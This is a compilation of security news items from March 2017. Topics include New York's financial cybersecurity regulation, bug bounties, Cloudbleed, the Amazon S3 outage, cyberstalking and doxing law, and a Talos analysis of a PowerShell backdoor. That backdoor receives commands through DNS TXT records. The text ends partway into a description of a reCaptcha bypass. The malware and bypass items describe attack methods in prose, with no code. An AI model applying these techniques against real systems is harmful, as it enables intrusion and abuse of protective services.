The New York State Department of Financial Services (DFS) 'first-in-the-nation' cybersecurity regulation for the financial services industry is, as of 1 March 2017, operational . One of the most highly regulated industries is now even more regulated in New York.
"New York is the financial capital of the world, and it is critical that we do everything in our power to protect consumers and our financial system from the ever-increasing threat of cyber-attacks," Governor Cuomo said. "These strong, first-in-the-nation protections will help ensure this industry has the necessary safeguards in place in order to protect themselves and the New Yorkers they serve from the serious economic harm caused by these devastating cyber-crimes."
The purpose of the regulation (PDF) is to provide 'certain regulatory minimum standards' while at the same time "not being overly prescriptive so that cybersecurity programs can match the relevant risks and keep pace with technological advances." This is a difficult line it seeks to follow by allowing the regulated entities to define the requirements according to their own risk assessments.
In regulatory terms, there is a potential weakness in that no controlling risk framework is defined on which to base those risk assessments -- leaving individual entities some scope to define the baseline for their own conformance. The NIST Cybersecurity Framework would be an obvious candidate -- but NIST is large and complex. "The NIST framework is extremely comprehensive, and for medium or small organizations, the burden of implementation wouldn't be feasible," comments Tim Erlin, senior director of IT security and risk strategist for Tripwire.
This leaves ambiguities in conformance. An example can be found in section 500.05 (Penetration Testing and Vulnerability Assessments). It states, "The cybersecurity program for each Covered Entity shall include monitoring and testing, developed in accordance with the Covered Entity's Risk Assessment, designed to assess the effectiveness of the Covered Entity's cybersecurity program." In short, the regulated organizations can choose between "effective continuous monitoring", and annual penetration testing with "bi-annual vulnerability assessments".
It could be argued that cyber security requires all of those. The most effective at finding vulnerabilities is perhaps the most expensive: penetration testing; but this provides only a slice-in-time. Annual pentesting would leave perhaps eleven months in which vulnerabilities could go untested -- and hence the bi-annual vulnerability scanning or continuous monitoring. What isn't defined, however, is what should happen with the results of the testing.
Consider the views of professional pentesters. A recent survey found that only 10% of pentesters "saw full remediation of all identified vulnerabilities." Almost a third of the pentesters felt they were employed for compliance purposes only. This is a danger for all regulations, and especially those that attempt to be 'not overly prescriptive': the more leeway offered to the regulated entities, the more likely it is that cyber security becomes conformance box-checking rather than security fulfilment.
The authors of the new regulation are not unaware of this problem, and have sought to limit it by requiring the regulated entities to provide an annual 'certificate of compliance' to the superintendent of financial services. This includes, "To the extent a Covered Entity has identified areas, systems or processes that require material improvement, updating or redesign, the Covered Entity shall document the identification and the remedial efforts planned and underway to address such areas, systems or processes."
The certificate requires that the board or senior officers have "reviewed documents, reports, certifications and opinions of such officers, employees, representatives, outside vendors and other individuals or entities as necessary." Furthermore, the statement must be "Signed by the Chairperson of the Board of Directors or Senior Officer(s)."
In short, the new regulation provides the regulated industries with a degree of compliance wiggle room by not being overly prescriptive, but then insists that responsibility for any wiggle is taken at the highest level. Any regulated industry that decides to wiggle will need to justify that wiggle; and since this is signed by the chairman of the board, there is no hiding place for any officer. This is perhaps the real innovation in this regulation, and one that might well be copied by other regulatory bodies in the future. This simple requirement could have a greater effect on moving cyber security into the boardroom than any other form of non-intrusive evolution.
Microsoft Temporarily Doubles Bounty Payouts for Online Services Bugs
3.3.2017 securityweek Security
For the next two months, developers who report vulnerabilities as part of Microsoft’s Online Services bounty program will receive doubled rewards for their work, the company announced.
Starting on March 1, 2017 until May 1, 2017, eligible vulnerability discoveries submitted for Microsoft Office 365 Portal and Microsoft Exchange Online will be rewarded twice as much as before.
Developers interested in getting the double rewards should be looking for vulnerabilities in six of the company’s domains: portal.office.com, outlook.office365.com, outlook.office.com, *.outlook.com, and outlook.com.
Microsoft launched the Online Services Bug Bounty program in September 2014 , and expanded it in April 2015 and August 2015 to add various Azure and Office 365 properties. Last year, the company added OneDrive to the program.
The company would normally pay between $500 and $15,000 for vulnerabilities in the online services, but bugs submitted during March and April can bring payments between $1,000 and $30,000. All of the vulnerabilities listed in the Online Services Bug Bounty Terms are eligible for the increased bounties.
On its Online Services Bug Bounty portal, Microsoft lists as eligible submissions the following types of vulnerabilities: Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Unauthorized cross-tenant data tampering or access (for multi-tenant services), Insecure direct object references, Injection Vulnerabilities, Authentication Vulnerabilities, Server-side Code Execution, Privilege Escalation, Significant Security Misconfiguration (when not caused by user).
“We realize the desire of researchers and customers to security test our services to ensure they can trust us and our solutions. We also believe that if a researcher informs us of a security flaw in our Office 365 services, they should be awarded for protecting us. These discoveries along with our internal security testing efforts contribute to keeping our users safe,” Akila Srinivasan and Travis Rhodes, Microsoft Security Response Center, note in a blog post.
Next Windows 10 Release Brings Improved Control of Updates, Privacy
3.3.2017 securityweek IT
Windows 10 Creators Update, the platform iteration expected to arrive next month, will provide users with improved control over software updates and privacy settings, Microsoft says.
Following the upcoming changes, updates will be less likely to be installed at an inopportune time and downloads will have a lower impact on user experience in Creators Update, courtesy of an enhanced update deployment experience. Furthermore, users will benefit from new privacy and diagnostic data collection settings, while also getting increased control over such settings through the web-based privacy dashboard the company launched in January.
In a blog post, John Cable, Director of Program Management within the Windows Servicing and Delivery (WSD) team, says that the upcoming improvements are based on the feedback Microsoft received from users via channels such as the Feedback Hub application, social media, and Windows forums.
One of the most important changes will impact the manner in which updates are installed, something that users can’t control at all at the moment. Right now, Windows 10 doesn’t provide options that users can tailor in line with their needs, while also impacting their experience with unexpected reboots that could also prove disruptive if they happen at the wrong time.
Windows 10 Creators Update, however, should change that by delivering several options for scheduling the timing of when updates install. Thus, users can specify exactly when an update should occur, can even reschedule an update when needed, and can even “snooze” the update notification to postpone the moment when they have to deal with it. According to Cable, users will be able to use the “snooze” capability to pause the update process for three days.
The “Active Hours” schedule will also be updated, so that Windows won’t end up installing an update at times when the user would actually want the device to be ready to use. The same as before, however, users will also be able to restart the device to immediately install the update.
“As always, we believe in the value of keeping devices ‘up to date,’ and recommend that you choose the installation defaults that Windows 10 provides so you will always have the latest features, apps, and security updates. However, when you need more control over the update experience, you will have new choices,” Cable notes.
He also explains that additional control over the update process will be available when clicking on a new icon on the Windows Update Settings page, which will allow users to verify whether their device is up to date or not. The new update experience, Cable says, has been available for users in the Windows Insider program for some time and has received positive reactions so far.
Before existing computers will be updated to Windows 10 Creators Update, users will be asked if they want to review their privacy settings, Cable says. Screenshots detailing the process have been published via a “quest” in the Feedback Hub application. “This feedback will help us iterate on this experience as we get closer to shipping the Creators Update,” Cable says.
Users who choose to review their privacy settings will access options related to location, speech recognition, diagnostics, and ads. They can also choose whether Microsoft should use diagnostics data to make recommendations regarding Microsoft products and services. A “Learn more” button will allow users to access additional information on these options, on how Windows Defender SmartScreen works, and on the related data transfers and uses.
Last year, Microsoft had to bring clarifications regarding its collection of user data, especially with France serving the software giant a notice to stop collecting excessive data or tracking browsing without consent from users.
The upcoming Windows 10 Creators Update is also expected to provide users with new options to improve their overall security. One of these options should block the installation of applications that are not distributed via the Microsoft Store. Essentially, it would block Win32 applications from being installed, thus preventing malware from infecting Windows 10 machines.
Google Expands Safe Browsing Protection on macOS
3.3.2017 securityweek Apple
Google announced this week that it will expand Safe Browsing on macOS in an effort to protect Chrome users against unwanted ad injections and unauthorized settings changes.
“Safe Browsing is broadening its protection of macOS devices, enabling safer browsing experiences by improving defenses against unwanted software and malware targeting macOS,” Google’s Kylie McRoberts and Ryan Rasti said on the company’s Security Blog. “As a result, macOS users may start seeing more warnings when they navigate to dangerous sites or download dangerous files.”
Applications that inject ads violate Google’s unwanted software policy and Mac users will be warned when Chrome detects such activity.
As for Chrome settings, the tech giant wants to ensure that applications cannot make unauthorized changes to the start page, the home page and the default search engine.
Google recently launched a new Mac API called Settings Overrides, which allows Chrome extensions to override the start page, home page and search settings in the web browser. The company wants this API to be the only approved method for making changes to Chrome settings on macOS and OS X.
However, only extensions approved for the Chrome Web Store are allowed to use the Settings Overrides API. Starting with March 31, Chrome will display a warning when a piece of software attempts to modify settings via other methods.
HackerOne Offers Free Service to Open Source Projects
3.3.2017 securityweek Security
Bug bounty platform provider HackerOne announced on Thursday that open source projects can benefit from its Professional services at no cost if they can meet certain conditions.
HackerOne, which recently raised $40 million in a Series C financing round, already hosts bug bounty programs for 36 open source projects, including GitLab, Ruby, Rails, Phabricator, Sentry, Discourse, Brave and Django. To date, these projects have resolved more than 1,200 vulnerabilities.
The company hopes to have other open source projects sign up for its services now that it has launched its Community Edition program.
Through the new program, open source applications can use HackerOne’s Pro service for free. The service provides the mechanisms necessary for vulnerability submissions, coordination, analytics, detecting duplicates, and paying out bounties.
It’s worth pointing out that while open source projects can benefit from this offer at no cost, HackerOne will still charge the usual 20 percent payment processing fee in the case of programs that pay out cash bounties.
A project is eligible for the offer if it’s covered by an Open Source Initiative (OSI) license, and it has been active for at least 3 months. Accepted projects are required to add a “SECURITY.md” file to their project root to provide details on submitting vulnerabilities, advertise the bug bounty program on their website, and commit to responding to new bug reports within a week.
“Our HackerOne program has been a definite success for us – a new way to get actionable security reports that improve the security of the open source Discourse project for everyone,” said Jeff Atwood, co-founder of Discourse. “A public bounty program is an essential element of the defense in depth philosophy that underpins all security efforts.”
HackerOne and Synack have been awarded a combined $7 million to help the U.S. Department of Justice and its components run bug bounty initiatives. One of these initiatives is Hack the Army, which received over 100 eligible vulnerability reports and paid out roughly $100,000 to participants.
Počet hackerských útoků na Rusko loni vzrostl na trojnásobek
3.3.2017 Novinky/Bezpečnost Počítačový útok
Počet pokusů o kybernetický útok na ruské informační systémy loni vzrostl na 52,5 miliónu, meziročně je to více než trojnásobek. Na konferenci v jihouralském Kurganu to v pátek řekl šéf ruské Bezpečnostní rady Nikolaj Patrušev.
"V roce 2015 šlo pouze o 14,4 miliónu případů," řekl Patrušev. Upozornil přitom, že systém zabezpečení není schopen bránit se většině existujících hrozeb.
Cílem hackerů je narušit fungování ruského internetu nebo snaha získat utajované informace, mimo jiné i pomocí útočných virů, řekl Patrušev. Účinnost systému zabezpečení proti kybernetickým útokům snižuje i neoprávněné připojení k internetu, nízká kvalifikace uživatelů a užívání zahraničních informačních technologií.
Cloudflare tries to downplay the impact of the Cloudbleed incident
3.3.2017 securityaffairs Incindent
According to Cloudflare, an initial analysis conducted its experts reveals that no personal data was leaked due to the CloudBleed issue.
On February 17 the Google Project Zero researcher Tavis Ormandy disclosed a serious bug in Cloudflare infrastructure, so-called Cloudbleed.
Ormandy discovered that Cloudflare was leaking a wide range of sensitive information, including authentication cookies and login credentials.
“On February 17th 2017, I was working on a corpus distillation project, when I encountered some data that didn’t match what I had been expecting. It’s not unusual to find garbage, corrupt data, mislabeled data or just crazy non-conforming data…but the format of the data this time was confusing enough that I spent some time trying to debug what had gone wrong, wondering if it was a bug in my code. In fact, the data was bizarre enough that some colleagues around the Project Zero office even got intrigued.” Ormandy wrote in a security advisory. “We fetched a few live samples, and we observed encryption keys, cookies, passwords, chunks of POST data and even HTTPS requests for other major cloudflare-hosted sites from other users. Once we understood what we were seeing and the implications, we immediately stopped and contacted cloudflare security.”
Follow
Tavis Ormandy @taviso
Cloudflare have been leaking customer HTTPS sessions for months. Uber, 1Password, FitBit, OKCupid, etc. https://bugs.chromium.org/p/project-zero/issues/detail?id=1139 …
12:00 AM - 24 Feb 2017
5,204 5,204 Retweets 3,252 3,252 likes
The flaw was introduced in September 2016, but it had the greatest impact between February 13 and February 18, when one in every 3.3 million requests going through Cloudflare’s systems may have resulted in memory leakage. The bug itself was addressed within hours, but it took several days to contain the incident due to the fact that leaked data had been cached by search engines.
Cloudflare co-founder and CEO Matthew Prince published a detailed blog post to analyze this “extremely serious bug” with a potentially massive impact.
The experts at Cloudflare analyzed the logs of the servers and confirmed that no evidence of malicious exploitation and that the vast majority of customers were not impacted.
“Given that the data that leaked was random on a per request basis, most requests would return nothing interesting. But, every once in awhile, the data that leaked may return something of interest to a hacker.” reads the analysis published by Cloudflare.
“If a hacker were aware of the bug before it was patched and trying to exploit it then the best way for them to do so would be to send as many requests as possible to a page that contained the set of conditions that would trigger the bug. They could then record the results. Most of what they would get would be useless, but some would contain very sensitive information,”.
“The nightmare scenario we have been worried about is if a hacker had been aware of the bug and had been quietly mining data before we were notified by Google’s Project Zero team and were able to patch it,”.
The Cloudbleed flaw was exploited more than 1.2 million times from 6,500 sites potentially exposed to the issue.
According to the experts, every time customer data is present, the company reaches out to the customer to share the data that it has discovered and provides the necessary support to mitigate any impact of the accidental exposure.
“Generally, if customer data was exposed, invalidating session cookies and rolling any internal authorization tokens is the best advice to mitigate the largest potential risk based on our investigation so far.” reads CloudFlare.
Users who are concerned that their data may have been exposed by Cloudbleed are invited to give a look at the list of potentially affected websites, meantime the experts at Cloudflare are still investigating the incident. Ormandy believes the company downplayed the risk.
“It is not correct to conclude that no passwords, credit cards, health records, social security numbers, or customer encryption keys were ever exposed,” Prince added. “However, if there was any exposure, based on the data we’ve reviewed, it does not appear to have been widespread. We have also not had any confirmed reports of third parties discovering any of these sensitive data types on any cached pages.”
Researchers at CloudFlare have seen approximately 150 customers’ data on the more than 80,000 cached pages they have purged from search engine caches
Talos team spotted a PowerShell malware that uses DNS queries to contact the C2
3.3.2017 securityaffairs Virus
Researchers from Cisco Talos team spotted a new strain of malware that leverages PowerShell scripts to fetch commands from DNS TXT records.
Malware researchers at Cisco Talos have published a detailed analysis on a targeted attack leveraging a weaponized Microsoft Word document that is spread in spam emails as an attachment.
The malicious code used in the attack is based on Windows PowerShell scripts, the RAT communicates with the C&C infrastructure through Domain Name Service.
The attacker used DNS as communication channel because DNS requests are never blocked on corporate networks.
The malicious code was first spotted by the security researcher (@simpo13) who reported his discovery to the Talos team because he noticed the code references Cisco’s SourceFire security appliances with the encoded text, “SourceFireSux.”
Follow
simpo @Simpo13
Welp, someone doesn't like SourceFire
3:49 PM - 24 Feb 2017
25 25 Retweets 39 39 likes
Attackers used a social engineering trick in order to trick victims into opening the malicious Word document.
“Interestingly, the Word document was made to appear as if it were associated with a secure email service that is secured by McAfee.” reads the blog post published by Talos. “This is likely an effective way to increase the odds of the victim opening the file and enabling macros as McAfee is a well known security vendor and likely immediately trusted by the victim. The document informs the user that it is secured and instructs the user to enable content.”
When the victim opens the document the multiple-stage infection starts with the execution of Visual Basic for Applications macro to launch PowerShell commands to install the backdoor onto the machine.
“The hash listed in the Pastebin led us to a malicious Word document that had also been uploaded to a public sandbox,” continues the Talos team. “The Word document initiated the same multiple-stage infection process as the file from the Hybrid Analysis report we previously discovered, and allowed us to reconstruct a more complete infection process.”
The VBA script unpacks a compressed and obfuscated second stage of PowerShell, which determines the PowerShell version installed on the system, then it adds entries to the Windows Registry and starts a third stage with a PowerShell script that acts as a backdoor.
In case the user does have administrative access, the installer PowerShell adds the backdoor to the Windows Management Instrumentation (WMI) database to gain persistence on the infected system after the reboot.
Once established the backdoor, in the stage 4 of the attack, the malicious code periodically makes DNS requests to one of the domains hard-coded into the script.
The requests retrieve TXT records from the domain that contain PowerShell commands that are directly executed by the infected system. It is important to notice that the code retrieved through the DNS requests but never written to the local system. This “fourth stage” script is the actual remote control tool used by the attacker. “Stage 4 is responsible for querying the C2 servers via DNS TXT message requests to ask what commands to execute,” Edmund Brumaghin told Ars via e-mail. “If a command is received, it is then executed and the output or results of the command are communicated back to the C2 server. This basically gives the attacker the ability to execute any Windows or application commands available on the infected host.”
“Once this is completed, the STDOUT and STDERR output that was captured from the Windows Command Line processor earlier in Stage 4 is transmitted using a “MSG” message. This allows the attacker to send commands to be executed directly by the Command Processor and receive the output of those commands all using DNS TXT requests and responses.” reads the analysis. “This communication is described in greater detail in the following section. Below is the DNS analysis and contents of the query request send from an infected system to the C2 server.”
The experts were not able to analyze the C2 infrastructure, the attack highlight the importance to inspect any network protocol to avoid problems.
“This malware sample is a great example of the length attackers are willing to go to stay undetected while operating within the environments that they are targeting.” concludes the Talos team. “It also illustrates the importance that in addition to inspecting and filtering network protocols such as HTTP/HTTPS, SMTP/POP3, etc. DNS traffic within corporate networks should also be considered a channel that an attacker can use to implement a fully functional, bidirectional C2 infrastructure.”
How A Simple Command Typo Took Down Amazon S3 and Big Chunk of the Internet
3.3.2017 thehahckernews Cyber
How A Simple Command Typo Took Down Amazon S3 and Big Chunk of the Internet On Tuesday
The major internet outage across the United States earlier this week was not due to any virus or malware or state-sponsored cyber attack, rather it was the result of a simple TYPO.
Amazon on Thursday admitted that an incorrectly typed command during a routine debugging of the company's billing system caused the 5-hour-long outage of some Amazon Web Services (AWS) servers on Tuesday.
The issue caused tens of thousands of websites and services to become completely unavailable, while others show broken images and links, which left online users around the world confused.
The sites and services affected by the disruption include Quora, Slack, Medium, Giphy, Trello, Splitwise, Soundcloud, and IFTTT, among a ton of others.
Here's What Happened:
On Tuesday morning, members of Amazon Simple Storage Service (S3) team were debugging the S3 cloud-storage billing system.
As part of the process, the team needed to take a few billing servers offline, but unfortunately, it ended up taking down a large set of servers.
"Unfortunately, one of the inputs to the command was entered incorrectly, and a larger set of servers was removed than intended," Amazon said. "The servers that were inadvertently removed supported two other S3 subsystems." …Whoops.
As for why it took longer than expected to restart certain services, Amazon says that some of its servers have not been restarted in "many years."
Since the S3 system has experienced massive growth over the last several years, "the process of restarting these services and running the necessary safety checks to validate the integrity of the metadata took longer than expected."
The company apologized for the inconvenience faced by its customers and promised that it will be putting new safeguards in place.
Amazon said the company is making "several changes" as a result of this incident, including steps to prevent an incorrect input from triggering such problems in the future.
The typo that caused the internet outage this week also knocked out the AWS Service Health Dashboard, so the company had to use its Twitter account to keep customers updated on the incident.
Due to this, Amazon is also changing the administration console for the AWS Service Health Dashboard, so that it can run across multiple regions.
Trump's New FCC Chairman Lets ISPs Sell Your Private Data Without Your Consent
3.3.2017 thehahckernews IT
Bad News for privacy concerned people!
It will be once again easier for Internet Service Providers (ISPs) to sell your personal data for marketing or advertisement purposes without taking your permission.
Last October, the United States Federal Communications Commission (FCC) passed a set of privacy rules on ISPs that restrict them from sharing your online data with third parties without your consent and require them to adopt "reasonable measures" to protect consumers' data from hackers.
However, now the FCC suspended privacy rules before they came into effect.
The reason? President Donald Trump's newly appointed FCC chairman Ajit Pai, a Republican and ex-Verizon lawyer.
Ajit Pai, who has openly expressed his views against net neutrality in the past, just last week said during a speech at Mobile World Congress that Net Neutrality was "a mistake" and indicated that the Commission is now moving back to internet regulations.
Now, Pai suspends privacy rules on ISPs, arguing that they favored companies like Google and Facebook, which are regulated by the Federal Trade Commission (FTC), over internet providers like Comcast and Verizon.
Pai wants the FCC, and the Federal Trade Commission should treat all online entities the same way. So those new privacy policies should be scrapped.
"All actors in the online space should be subject to the same rules, and the federal government shouldn’t favor one set of companies over another," FCC said in a statement.
"Therefore, he has advocated returning to a technology-neutral privacy framework for the online world and harmonizing the FCC’s privacy rules for broadband providers with the FTC’s standards for others in the digital economy."
The FCC will now likely pass a new set of standards in the way the FTC regulates websites. It's like, if the FTC requires sites like Facebook and Google to seek explicit permission before selling your data, the FCC may follow suit for ISPs.
In other words, the FCC will keep a hold on new privacy rules. Since FTC would never hurt advertising business model of Google and Facebook, FCC would never restore those suspended rules on ISPs.
How does this Move Affect You?
If you are unaware, your internet service provider knows your most intimate and personal online activities.
Unlike Google which uses encryption to prevent anyone from seeing your online searches, your ISP can see your search queries, what websites you visit, when you visit them, and what apps you use.
The ISPs then share this data with other companies for advertisements, marketing or other purposes. And with this information in hands, it's very easy for any advertising company to know users' interests based on their online behaviors and serve them targeted ads.
Not surprisingly, the broadband industry applauded the FCC's new move, calling it "a welcome recognition that consumers benefit most when privacy protections are consistently applied throughout the Internet ecosystem."
But privacy advocates are not at all happy with the FCC's action, arguing that suspending the privacy rules favor the Internet providers like Comcast and Verizon since the ISPs do not need the same data security rules the FTC requires of websites.
Trolling, Doxing & Cyberstalking: Cybercrime & The Law
3.3.2017 securityaffairs CyberCrime
Trolling, Doxing & Cyberstalking: Cybercrime & The Law. Cybercrime is one of the greatest threats facing US with implications for national security.
According to the US Department of Justice (DOJ), “cybercrime is one of the greatest threats facing our country and has enormous implications for our national security, economic prosperity, and public safety. The range of threats and the challenges they present for law enforcement expand just as rapidly as technology evolves.”
Cyberstalking
The US Attorney’s Office (USAO) released a report in 2016 which stated that, “under the federal cyberstalking statute, ‘cyberstalking’ includes any course of conduct or series of acts taken by the perpetrator on the Internet that place the victim in reasonable fear of death or serious bodily injury, or causes, attempts to cause, or would be reasonably expected to cause substantial emotional distress to the victim or the victim’s immediate family. 18 U.S.C. § 2261A (2015). However, there are a number of federal statutes that may apply in cyberstalking situations.”
The DOJ’s Office of Victims of Crime cites the following common elements of cyberstalking:
Repeated, unwanted, intrusive, and frightening communications from the perpetrator by phone, mail, and/or email
Making direct or indirect threats to harm the victim, the victim’s children, relatives, friends, or pets
Harassing the victim through the Internet
Posting information or spreading rumors about the victim on the Internet
Obtaining personal information about the victim by accessing public records, using Internet search services, hiring private investigators, searching through the victim’s garbage, following the victim around the internet and contacting the victim’s friends, family, co-workers, neighbors, etc.
Michigan was the first state to charge someone with online stalking. There are laws at both the state and federal levels that can be applied to cyberstalking.
“Stalking, threats, and harassment offenses used to to be primarily local law enforcement matters. But with the increased use of technology and the multi-jurisdictional nature of many of these offenses, federal law enforcement and prosecutors can offer additional resources to effectively pursue these cases that may exceed the capacity of local law enforcement.”
Zane D. Memeger, former U.S. Attorney for the Eastern District of Pennsylvania wrote that, “a very important tool in our effort to combat stalking and threats via the Internet is 18 U.S.C. § 875(c), which makes it a federal crime, punishable by up to five years in prison and a $250,000 fine, to transmit any communication in interstate or foreign commerce containing a threat to injure the person of another.”
In 2016, there were several federal cyberstalking convictions.
A cyberstalking conviction can have a significant impact–on your finances, reputation, ability to get a job and your freedom. Even if you are not incarcerated, a conviction can have negative impact on your parental rights and can disqualify you from employment in certain settings, such as hospitals and schools.
Doxing
Doxing is the process of gathering identifiable information about an individual or group of people, with the objective to shame, scare, blackmail, defame, bully or endanger the target.
While some individuals perform doxing out of general curiosity about a person or company, others have less honorable motives. The motives may include revenge, extortion, or embarrassment. But, publicly posting an individual’s personal details is often done with the knowledge that it could potentially put the targeted individual in danger, particularly if the person is a law enforcement officer, an undercover agent or a high profile individual.
Further, a dox is likely to drag the families and sometimes friends of the target into the fray. Sadly, this sometimes includes children.
Occasionally, doxing sets the target up for further cybercrimes including identity theft, credit card and/or debit card fraud, phishing, hacking or other cyber crimes.
Posting personal information publicly with the intent to shame, defame, harass or endanger is illegal. It places the doxed individual in a potentially dangerous situation. The federal law often utilized to address doxing is 18 U.S.C. § 2261A:
“Title 18, United States Code, Section 2261A is the federal stalking statute. Section
2261A(1) covers in-person stalking and Section 2261A(2) covers cyberstalking— stalking that occurs using Internet or telephones—as well as stalking that occurs using the mail. Section 2261(2), originally enacted as part of the Violence Against Women Act of 2005, has two main provisions—Subsections (A) and (B):
Both provisions require that the defendant act with the intent to kill, injure, harass, intimidate, or place under surveillance with intent to kill, injure, harass, or intimidate another person.
Both provisions also require the use of the mail, any interactive computer service or electronic communication service or electronic communication system of interstate commerce, or any other facility of interstate or foreign commerce. Usually, this element is met with the use of the Internet.
Both provisions also require that the defendant engaged in a course of conduct, meaning more than one act. Subsection (A) further requires that the course of conduct places the victim in reasonable fear of the death of, or serious bodily injury to, the victim, the victim’s spouse or intimate partner, or to an immediate family member of the victim. Subsection (B) requires instead that the course of conduct causes, attempts to cause, or would be reasonably expected to cause substantial emotional distress to the victim or the victim’s immediate family.”
Also, if you dox someone using a service such as Facebook, Twitter or WordPress you may be in violation of the service’s Terms of Service.
In the case of a group of individuals involved in the gathering of information, publicly posting it, sharing it or using it to harass the victim, under certain circumstances the act of one conspirator may be treated, by law, as an act of all involved. This means that all the conspirators may be held accountable for the acts committed by any one or more of them even though they did not all personally participate in that act themselves. This is particularly important in cases in which cyberstalking, including doxing, leads to the murder of the targeted individual:
“In the case of a jointly undertaken activity, subsection (a)(1)(B) provides that a defendant is accountable for the conduct (acts and omissions) of others that was both:
(A) in furtherance of the jointly undertaken criminal activity; and
(B) reasonably foreseeable in connection with that criminal activity.”
It has been argued that it is reasonably foreseeable that publicly posting someone’s personal information could endanger that individual and/or members of their family.
Certain individuals have additional protection from doxing, under the law. This would include jurors, witnesses, court officers, informants and some state and local officers:
“(a)In General.—Whoever knowingly makes restricted personal information about a covered person, or a member of the immediate family of that covered person, publicly available—
with the intent to threaten, intimidate, or incite the commission of a crime of violence against that covered person, or a member of the immediate family of that covered person; or
with the intent and knowledge that the restricted personal information will be used to threaten, intimidate, or facilitate the commission of a crime of violence against that covered person, or a member of the immediate family of that covered person,
shall be fined under this title, imprisoned not more than 5 years, or both.
(b) Definitions.—In this section—
(1) the term “restricted personal information” means, with respect to an individual, the Social Security number, the home address, home phone number, mobile phone number, personal email, or home fax number of, and identifiable to, that individual;
(2) the term “covered person” means—
(A) an individual designated in section 1114;
(B) a grand or petit juror, witness, or other officer in or of, any court of the United States, or an officer who may be, or was, serving at any examination or other proceeding before any United States magistrate judge or other committing magistrate;
(C) an informant or witness in a Federal criminal investigation or prosecution; or
(D) a State or local officer or employee whose restricted personal information is made publicly available because of the participation in, or assistance provided to, a Federal criminal investigation by that officer or employee”
Disclosing the identity of an individual working undercover is also often against the law. Anyone who doxes someone who is working undercover for the federal government is in violation of federal law. Those who are protected by this law include intelligence officers, agents, informants, and sources.
“Whoever, in the course of a pattern of activities intended to identify and expose covert agents and with reason to believe that such activities would impair or impede the foreign intelligence activities of the United States, discloses any information that identifies an individual as a covert agent to any individual not authorized to receive classified information, knowing that the information disclosed so identifies such individual and that the United States is taking affirmative measures to conceal such individual’s classified intelligence relationship to the United States, shall be fined not more than $15,000 or imprisoned not more than three years, or both.”
It is also a bad idea to tip someone off that they are the focus of a federal investigation:
“Obstruction of Justice by ‘Tip-Off’
Although an individual who obstructs a federal investigation by tipping off the targets of the investigation is likely to incur liability either as a principal under 18 U.S.C. 2 or as an accessory after the fact under 18 U.S.C. 3, there are several federal anti-tip-off statutes like §1510, which prohibits bank officials from notifying suspects that they are under investigation, and which imposes a similar restriction on insurance company officers and employees.
(1) Except as otherwise specifically provided in this chapter any person who … (e) (i) intentionally discloses, or endeavors to disclose, to any other person the contents of any wire, oral, or electronic communication, intercepted by means authorized by subsections 2511(2)(a)(ii), 2511(2)(b) to (c), 2511(2)(e), 2516, and 2518 of this chapter, (ii) knowing or having reason to know that the information was obtained through the interception of such a communication in connection with a criminal investigation, (iii) having obtained or received the information in connection with a criminal investigation, and (iv) with intent to improperly obstruct, impede, or interfere with a duly authorized criminal investigation … (4)(a) … shall be fined under this title or imprisoned not more than five years, or both,” 18 U.S.C.2511(1)(e), (4)(a).”
This includes social media posts that would provide warning to a suspect or suspects that they are being investigated by the federal government.
Cyberstalking & Doxing Cases
Woman Sentenced for Harassing Victim on Social Media
Hacking, Carding, SWATting and OCD: The Case of Mir Islam
The Crackas With Attitude Case–Hacking The CIA Director
Kosovan-born Ardit Ferizi, who hacked into the servers of an American firm, nicked records on 1,300 US service personnel from its database, and published the info online. He was quickly caught and sent down for 20 years.
The death of television personality Charlotte Dawson and the possible role that online abuse played in her struggles with depression. The former model had told of her battles with depression and the abuse and harassment she suffered from users on Twitter.
Cyberstalking and Production of Child Pornography
A Cyberstalking Case That Ended in Murder: Three Family Members Receive Life Sentences for Courthouse Murder Conspiracy
The Psychology of Trolls & Cyberstalkers
Researchers from Winnipeg found clear evidence that trolling is associated specifically with sadism and to a lesser degree with Machiavellianism. The researchers also found that trolls who admit to being sadistic report that they tend to troll because they find it to be pleasurable.
Cyberstalkers, however, are often propelled by the presence of personality disorders, poor emotional control, and antisocial tendencies.
While trolls take pleasure in their behavior, cyberstalkers are more likely to be “highly distressed and angry with the victim. While they may get secondary pleasure from it, stalkers who intimidate or threaten usually have the very specific purpose of expressing their negative feelings and making the victim feel as bad as they do.”
Trolls are in it for fun but a cyberstalker tends to be more emotionally invested in pursuing the victim. Ignoring a troll will generally make them go away, but ignoring a cyberstalker can produce an escalation in the stalking behavior. If it gets to that point, it’s time to consider involving law enforcement.
Help for Victims
The DOJ has issued recommendations for people who believe they are victims of cyberstalking. The first step should be to demand the stalker to cease all contact and stop the harassing actions. Additionally, in order to facilitate prosecution of the perpetrator, the victim should:
Save all emails, messages, and other communications for evidence. It is vital that these are not altered in any way, and that the electronic copies are kept, rather than only printouts.
Save all records of threats against the victim’s safety or life. This includes any written or recorded threats, and logs of the date, time, and circumstances of verbal threats.
Contact the perpetrator’s internet service provider. Internet service providers (ISP) prohibit their users from using their service to harass others. Contacting the ISP may result in discontinuation of the harasser’s internet service, and will put the ISP on notice to maintain record of the harasser’s internet use.
Keep detailed records of contact with ISP and law enforcement officials. It is important to keep a log of all reports made to any agency or provider, and to obtain copies of the official reports when available.
Additionally, the LookingGlass Special Investigations Unit recommends:
Use strong passwords (avoid clichés like birth dates)
Change passwords often
Do not use the same credentials on more than one account and never rotate or reuse old passwords
Do not use work emails for your social media accounts
Use privacy settings on social networking sites to allow only friends or connections to view the account’s content
Keep up-to-date on changes to privacy policy levels by frequently visiting the ‘Privacy and Security settings
If possible, limit your personal postings on media sites and carefully consider your comments
Disable geotagging features on mobile devices
Pay close attention to messages containing attachments or links to other websites; they may be infected
ReBreakCaptcha – How to breaking Google’s ReCaptcha v2 using Google’s APIs
3.3.2017 securityaffairs Safety
The researcher East-Ee Security devised a proof of concept bypass of the Google’s reCaptcha V2 verification system dubbed ReBreakCaptcha.
East-Ee Security proposed a proof of concept bypass of the Google’s reCaptcha V2 verification system dubbed ReBreakCaptcha. The PoC uses the Google web-based tools for its purpose. According to the author, ReBreakCaptcha “lets you easily bypass Google’s reCaptcha v2 anywhere on the web.”
The CAPTCHA (Completely Automated Procedures for Telling Computers and Humans Apart) service was devised to defeat bots and scripts that can be used to register thousands of accounts at a time. ReCaptcha is the CAPTCHA solution proposed by Google that leverages image, audio or text challenges to verify the presence of a human while accessing the online service.
The ReBreakCaptcha is able to byPass reCaptcha V2 via a script that leverages Google APIs to capture audio challenges as sound files.
The ReBreakCaptcha works in three stages:
Audio Challenge – Getting the correct challenge type.
